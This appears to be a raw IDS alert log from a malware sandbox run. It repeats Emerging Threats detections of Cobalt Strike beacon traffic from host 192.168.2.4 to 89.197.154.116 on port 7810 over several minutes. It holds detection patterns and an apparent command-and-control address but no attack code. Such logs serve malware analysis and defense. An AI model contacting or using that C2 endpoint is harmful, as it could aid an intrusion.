                                                                2024-10-07T22:00:27.767095+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44974989.197.154.1167810TCP
                                                                2024-10-07T22:00:29.450557+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44975089.197.154.1167810TCP
                                                                2024-10-07T22:00:29.450557+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44975089.197.154.1167810TCP
                                                                2024-10-07T22:00:33.574658+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44975189.197.154.1167810TCP
                                                                2024-10-07T22:00:33.574658+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44975189.197.154.1167810TCP
                                                                2024-10-07T22:00:35.545658+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44975289.197.154.1167810TCP
                                                                2024-10-07T22:00:35.545658+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44975289.197.154.1167810TCP
                                                                2024-10-07T22:00:37.247360+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44975389.197.154.1167810TCP
                                                                2024-10-07T22:00:37.247360+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44975389.197.154.1167810TCP
                                                                2024-10-07T22:00:38.969491+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44975489.197.154.1167810TCP
                                                                2024-10-07T22:00:38.969491+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44975489.197.154.1167810TCP
                                                                2024-10-07T22:00:40.675331+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44975589.197.154.1167810TCP
                                                                2024-10-07T22:00:40.675331+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44975589.197.154.1167810TCP
                                                                2024-10-07T22:00:42.358293+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44975689.197.154.1167810TCP
                                                                2024-10-07T22:00:42.358293+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44975689.197.154.1167810TCP
                                                                2024-10-07T22:00:44.092723+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44975789.197.154.1167810TCP
                                                                2024-10-07T22:00:44.092723+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44975789.197.154.1167810TCP
                                                                2024-10-07T22:00:45.812862+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44975889.197.154.1167810TCP
                                                                2024-10-07T22:00:45.812862+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44975889.197.154.1167810TCP
                                                                2024-10-07T22:00:47.535783+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44975989.197.154.1167810TCP
                                                                2024-10-07T22:00:47.535783+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44975989.197.154.1167810TCP
                                                                2024-10-07T22:00:49.272785+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44976089.197.154.1167810TCP
                                                                2024-10-07T22:00:49.272785+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44976089.197.154.1167810TCP
                                                                2024-10-07T22:00:50.988910+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44976189.197.154.1167810TCP
                                                                2024-10-07T22:00:50.988910+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44976189.197.154.1167810TCP
                                                                2024-10-07T22:00:52.881734+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44976289.197.154.1167810TCP
                                                                2024-10-07T22:00:52.881734+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44976289.197.154.1167810TCP
                                                                2024-10-07T22:00:54.576802+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44976389.197.154.1167810TCP
                                                                2024-10-07T22:00:54.576802+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44976389.197.154.1167810TCP
                                                                2024-10-07T22:00:56.263309+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44976489.197.154.1167810TCP
                                                                2024-10-07T22:00:56.263309+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44976489.197.154.1167810TCP
                                                                2024-10-07T22:00:57.971739+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44976589.197.154.1167810TCP
                                                                2024-10-07T22:00:57.971739+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44976589.197.154.1167810TCP
                                                                2024-10-07T22:00:59.680335+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44976789.197.154.1167810TCP
                                                                2024-10-07T22:00:59.680335+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44976789.197.154.1167810TCP
                                                                2024-10-07T22:01:01.395075+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44976989.197.154.1167810TCP
                                                                2024-10-07T22:01:01.395075+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44976989.197.154.1167810TCP
                                                                2024-10-07T22:01:03.285490+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44978089.197.154.1167810TCP
                                                                2024-10-07T22:01:03.285490+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44978089.197.154.1167810TCP
                                                                2024-10-07T22:01:04.987483+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44979189.197.154.1167810TCP
                                                                2024-10-07T22:01:04.987483+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44979189.197.154.1167810TCP
                                                                2024-10-07T22:01:06.689132+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44980789.197.154.1167810TCP
                                                                2024-10-07T22:01:06.689132+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44980789.197.154.1167810TCP
                                                                2024-10-07T22:01:08.658738+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44981889.197.154.1167810TCP
                                                                2024-10-07T22:01:08.658738+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44981889.197.154.1167810TCP
                                                                2024-10-07T22:01:10.359503+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44982589.197.154.1167810TCP
                                                                2024-10-07T22:01:10.359503+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44982589.197.154.1167810TCP
                                                                2024-10-07T22:01:12.084607+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44984089.197.154.1167810TCP
                                                                2024-10-07T22:01:12.084607+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44984089.197.154.1167810TCP
                                                                2024-10-07T22:01:13.796875+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44985189.197.154.1167810TCP
                                                                2024-10-07T22:01:13.796875+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44985189.197.154.1167810TCP
                                                                2024-10-07T22:01:15.534739+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44985789.197.154.1167810TCP
                                                                2024-10-07T22:01:15.534739+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44985789.197.154.1167810TCP
                                                                2024-10-07T22:01:17.252714+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44986889.197.154.1167810TCP
                                                                2024-10-07T22:01:17.252714+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44986889.197.154.1167810TCP
                                                                2024-10-07T22:01:18.941423+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44987989.197.154.1167810TCP
                                                                2024-10-07T22:01:18.941423+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44987989.197.154.1167810TCP
                                                                2024-10-07T22:01:20.873023+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44989489.197.154.1167810TCP
                                                                2024-10-07T22:01:20.873023+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44989489.197.154.1167810TCP
                                                                2024-10-07T22:01:22.591355+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44990689.197.154.1167810TCP
                                                                2024-10-07T22:01:22.591355+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44990689.197.154.1167810TCP
                                                                2024-10-07T22:01:24.295453+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44991889.197.154.1167810TCP
                                                                2024-10-07T22:01:24.295453+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44991889.197.154.1167810TCP
                                                                2024-10-07T22:01:25.987531+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44993189.197.154.1167810TCP
                                                                2024-10-07T22:01:25.987531+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44993189.197.154.1167810TCP
                                                                2024-10-07T22:01:30.231283+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44993989.197.154.1167810TCP
                                                                2024-10-07T22:01:30.231283+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44993989.197.154.1167810TCP
                                                                2024-10-07T22:01:31.987185+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44996489.197.154.1167810TCP
                                                                2024-10-07T22:01:31.987185+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44996489.197.154.1167810TCP
                                                                2024-10-07T22:01:33.703695+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44997489.197.154.1167810TCP
                                                                2024-10-07T22:01:33.703695+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44997489.197.154.1167810TCP
                                                                2024-10-07T22:01:35.440140+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44998589.197.154.1167810TCP
                                                                2024-10-07T22:01:35.440140+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44998589.197.154.1167810TCP
                                                                2024-10-07T22:01:37.248186+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44999989.197.154.1167810TCP
                                                                2024-10-07T22:01:37.248186+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.44999989.197.154.1167810TCP
                                                                2024-10-07T22:01:38.959548+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45001089.197.154.1167810TCP
                                                                2024-10-07T22:01:38.959548+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45001089.197.154.1167810TCP
                                                                2024-10-07T22:01:40.674934+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45002289.197.154.1167810TCP
                                                                2024-10-07T22:01:40.674934+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45002289.197.154.1167810TCP
                                                                2024-10-07T22:01:42.555618+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45003189.197.154.1167810TCP
                                                                2024-10-07T22:01:42.555618+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45003189.197.154.1167810TCP
                                                                2024-10-07T22:01:44.253610+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45003689.197.154.1167810TCP
                                                                2024-10-07T22:01:44.253610+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45003689.197.154.1167810TCP
                                                                2024-10-07T22:01:45.937035+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45004789.197.154.1167810TCP
                                                                2024-10-07T22:01:45.937035+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45004789.197.154.1167810TCP
                                                                2024-10-07T22:01:47.705942+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45005689.197.154.1167810TCP
                                                                2024-10-07T22:01:47.705942+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45005689.197.154.1167810TCP
                                                                2024-10-07T22:01:49.411092+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45006189.197.154.1167810TCP
                                                                2024-10-07T22:01:49.411092+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45006189.197.154.1167810TCP
                                                                2024-10-07T22:01:51.121962+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45006289.197.154.1167810TCP
                                                                2024-10-07T22:01:51.121962+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45006289.197.154.1167810TCP
                                                                2024-10-07T22:01:52.812386+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45006389.197.154.1167810TCP
                                                                2024-10-07T22:01:52.812386+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45006389.197.154.1167810TCP
                                                                2024-10-07T22:01:54.523649+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45006489.197.154.1167810TCP
                                                                2024-10-07T22:01:54.523649+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45006489.197.154.1167810TCP
                                                                2024-10-07T22:01:56.234251+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45006589.197.154.1167810TCP
                                                                2024-10-07T22:01:56.234251+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45006589.197.154.1167810TCP
                                                                2024-10-07T22:01:57.943671+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45006689.197.154.1167810TCP
                                                                2024-10-07T22:01:57.943671+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45006689.197.154.1167810TCP
                                                                2024-10-07T22:01:59.659436+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45006789.197.154.1167810TCP
                                                                2024-10-07T22:01:59.659436+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45006789.197.154.1167810TCP
                                                                2024-10-07T22:02:00.965734+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45006889.197.154.1167810TCP
                                                                2024-10-07T22:02:00.965734+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45006889.197.154.1167810TCP
                                                                2024-10-07T22:02:02.745780+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45006989.197.154.1167810TCP
                                                                2024-10-07T22:02:02.745780+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45006989.197.154.1167810TCP
                                                                2024-10-07T22:02:04.531226+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45007089.197.154.1167810TCP
                                                                2024-10-07T22:02:04.531226+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45007089.197.154.1167810TCP
                                                                2024-10-07T22:02:06.279916+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45007189.197.154.1167810TCP
                                                                2024-10-07T22:02:06.279916+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45007189.197.154.1167810TCP
                                                                2024-10-07T22:02:07.987670+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45007289.197.154.1167810TCP
                                                                2024-10-07T22:02:07.987670+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45007289.197.154.1167810TCP
                                                                2024-10-07T22:02:09.688424+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45007389.197.154.1167810TCP
                                                                2024-10-07T22:02:09.688424+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45007389.197.154.1167810TCP
                                                                2024-10-07T22:02:11.375813+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45007489.197.154.1167810TCP
                                                                2024-10-07T22:02:11.375813+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45007489.197.154.1167810TCP
                                                                2024-10-07T22:02:13.110536+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45007589.197.154.1167810TCP
                                                                2024-10-07T22:02:13.110536+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45007589.197.154.1167810TCP
                                                                2024-10-07T22:02:14.797259+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45007689.197.154.1167810TCP
                                                                2024-10-07T22:02:14.797259+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45007689.197.154.1167810TCP
                                                                2024-10-07T22:02:18.921867+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45007789.197.154.1167810TCP
                                                                2024-10-07T22:02:18.921867+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45007789.197.154.1167810TCP
                                                                2024-10-07T22:02:20.671891+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45007889.197.154.1167810TCP
                                                                2024-10-07T22:02:20.671891+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45007889.197.154.1167810TCP
                                                                2024-10-07T22:02:22.359658+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45007989.197.154.1167810TCP
                                                                2024-10-07T22:02:22.359658+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45007989.197.154.1167810TCP
                                                                2024-10-07T22:02:24.047079+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45008089.197.154.1167810TCP
                                                                2024-10-07T22:02:24.047079+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45008089.197.154.1167810TCP
                                                                2024-10-07T22:02:25.775690+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45008189.197.154.1167810TCP
                                                                2024-10-07T22:02:25.775690+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45008189.197.154.1167810TCP
                                                                2024-10-07T22:02:27.509125+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45008289.197.154.1167810TCP
                                                                2024-10-07T22:02:27.509125+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45008289.197.154.1167810TCP
                                                                2024-10-07T22:02:29.296493+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45008389.197.154.1167810TCP
                                                                2024-10-07T22:02:29.296493+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45008389.197.154.1167810TCP
                                                                2024-10-07T22:02:30.987183+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45008489.197.154.1167810TCP
                                                                2024-10-07T22:02:30.987183+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45008489.197.154.1167810TCP
                                                                2024-10-07T22:02:32.843335+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45008589.197.154.1167810TCP
                                                                2024-10-07T22:02:32.843335+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45008589.197.154.1167810TCP
                                                                2024-10-07T22:02:34.579818+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45008689.197.154.1167810TCP
                                                                2024-10-07T22:02:34.579818+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45008689.197.154.1167810TCP
                                                                2024-10-07T22:02:36.284525+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45008789.197.154.1167810TCP
                                                                2024-10-07T22:02:36.284525+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45008789.197.154.1167810TCP
                                                                2024-10-07T22:02:37.991762+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45008889.197.154.1167810TCP
                                                                2024-10-07T22:02:37.991762+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45008889.197.154.1167810TCP
                                                                2024-10-07T22:02:39.922933+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45008989.197.154.1167810TCP
                                                                2024-10-07T22:02:39.922933+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45008989.197.154.1167810TCP
                                                                2024-10-07T22:02:41.609244+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45009089.197.154.1167810TCP
                                                                2024-10-07T22:02:41.609244+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45009089.197.154.1167810TCP
                                                                2024-10-07T22:02:43.394927+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45009189.197.154.1167810TCP
                                                                2024-10-07T22:02:43.394927+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45009189.197.154.1167810TCP
                                                                2024-10-07T22:02:45.110616+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45009289.197.154.1167810TCP
                                                                2024-10-07T22:02:45.110616+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45009289.197.154.1167810TCP
                                                                2024-10-07T22:02:46.838712+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45009389.197.154.1167810TCP
                                                                2024-10-07T22:02:46.838712+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45009389.197.154.1167810TCP
                                                                2024-10-07T22:02:48.670293+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45009489.197.154.1167810TCP
                                                                2024-10-07T22:02:48.670293+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45009489.197.154.1167810TCP
                                                                2024-10-07T22:02:50.382420+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45009589.197.154.1167810TCP
                                                                2024-10-07T22:02:50.382420+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45009589.197.154.1167810TCP
                                                                2024-10-07T22:02:52.127731+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45009689.197.154.1167810TCP
                                                                2024-10-07T22:02:52.127731+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45009689.197.154.1167810TCP
                                                                2024-10-07T22:02:53.847880+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45009789.197.154.1167810TCP
                                                                2024-10-07T22:02:53.847880+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45009789.197.154.1167810TCP
                                                                2024-10-07T22:02:55.531342+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45009889.197.154.1167810TCP
                                                                2024-10-07T22:02:55.531342+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45009889.197.154.1167810TCP
                                                                2024-10-07T22:02:57.239729+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45009989.197.154.1167810TCP
                                                                2024-10-07T22:02:57.239729+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45009989.197.154.1167810TCP
                                                                2024-10-07T22:02:59.271603+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45010089.197.154.1167810TCP
                                                                2024-10-07T22:02:59.271603+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45010089.197.154.1167810TCP
                                                                2024-10-07T22:03:01.004317+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45010189.197.154.1167810TCP
                                                                2024-10-07T22:03:01.004317+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45010189.197.154.1167810TCP
                                                                2024-10-07T22:03:03.244781+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45010289.197.154.1167810TCP
                                                                2024-10-07T22:03:03.244781+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45010289.197.154.1167810TCP
                                                                2024-10-07T22:03:04.960032+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45010389.197.154.1167810TCP
                                                                2024-10-07T22:03:04.960032+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45010389.197.154.1167810TCP
                                                                2024-10-07T22:03:06.689840+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45010489.197.154.1167810TCP
                                                                2024-10-07T22:03:06.689840+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45010489.197.154.1167810TCP
                                                                2024-10-07T22:03:08.399776+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45010589.197.154.1167810TCP
                                                                2024-10-07T22:03:08.399776+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45010589.197.154.1167810TCP
                                                                2024-10-07T22:03:11.048493+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45010689.197.154.1167810TCP
                                                                2024-10-07T22:03:11.048493+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45010689.197.154.1167810TCP
                                                                2024-10-07T22:03:12.779771+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45010789.197.154.1167810TCP
                                                                2024-10-07T22:03:12.779771+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45010789.197.154.1167810TCP
                                                                2024-10-07T22:03:14.471824+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45010889.197.154.1167810TCP
                                                                2024-10-07T22:03:14.471824+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45010889.197.154.1167810TCP
                                                                2024-10-07T22:03:16.195755+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45010989.197.154.1167810TCP
                                                                2024-10-07T22:03:16.195755+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45010989.197.154.1167810TCP
                                                                2024-10-07T22:03:20.324957+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45011089.197.154.1167810TCP
                                                                2024-10-07T22:03:20.324957+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45011089.197.154.1167810TCP
                                                                2024-10-07T22:03:22.036589+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45011189.197.154.1167810TCP
                                                                2024-10-07T22:03:22.036589+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45011189.197.154.1167810TCP
                                                                2024-10-07T22:03:23.736122+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45011289.197.154.1167810TCP
                                                                2024-10-07T22:03:23.736122+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45011289.197.154.1167810TCP
                                                                2024-10-07T22:03:25.438851+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45011389.197.154.1167810TCP
                                                                2024-10-07T22:03:25.438851+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45011389.197.154.1167810TCP
                                                                2024-10-07T22:03:27.125403+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45011489.197.154.1167810TCP
                                                                2024-10-07T22:03:27.125403+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45011489.197.154.1167810TCP
                                                                2024-10-07T22:03:31.246894+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45011589.197.154.1167810TCP
                                                                2024-10-07T22:03:31.246894+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45011589.197.154.1167810TCP
                                                                2024-10-07T22:03:32.940347+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45011689.197.154.1167810TCP
                                                                2024-10-07T22:03:32.940347+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45011689.197.154.1167810TCP
                                                                2024-10-07T22:03:34.924692+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45011789.197.154.1167810TCP
                                                                2024-10-07T22:03:34.924692+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45011789.197.154.1167810TCP
                                                                2024-10-07T22:03:36.647798+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45011889.197.154.1167810TCP
                                                                2024-10-07T22:03:36.647798+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45011889.197.154.1167810TCP
                                                                2024-10-07T22:03:38.367772+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45011989.197.154.1167810TCP
                                                                2024-10-07T22:03:38.367772+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45011989.197.154.1167810TCP
                                                                2024-10-07T22:03:40.067334+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45012089.197.154.1167810TCP
                                                                2024-10-07T22:03:40.067334+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45012089.197.154.1167810TCP
                                                                2024-10-07T22:03:41.793351+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45012189.197.154.1167810TCP
                                                                2024-10-07T22:03:41.793351+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45012189.197.154.1167810TCP
                                                                2024-10-07T22:03:43.493833+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45012289.197.154.1167810TCP
                                                                2024-10-07T22:03:43.493833+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45012289.197.154.1167810TCP
                                                                2024-10-07T22:03:45.472141+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45012389.197.154.1167810TCP
                                                                2024-10-07T22:03:45.472141+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45012389.197.154.1167810TCP
                                                                2024-10-07T22:03:47.489094+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45012489.197.154.1167810TCP
                                                                2024-10-07T22:03:47.489094+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45012489.197.154.1167810TCP
                                                                2024-10-07T22:03:49.298704+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45012589.197.154.1167810TCP
                                                                2024-10-07T22:03:49.298704+02002036677ET MALWARE Cobalt Strike Related Activity (GET)1192.168.2.45012589.197.154.1167810TCP
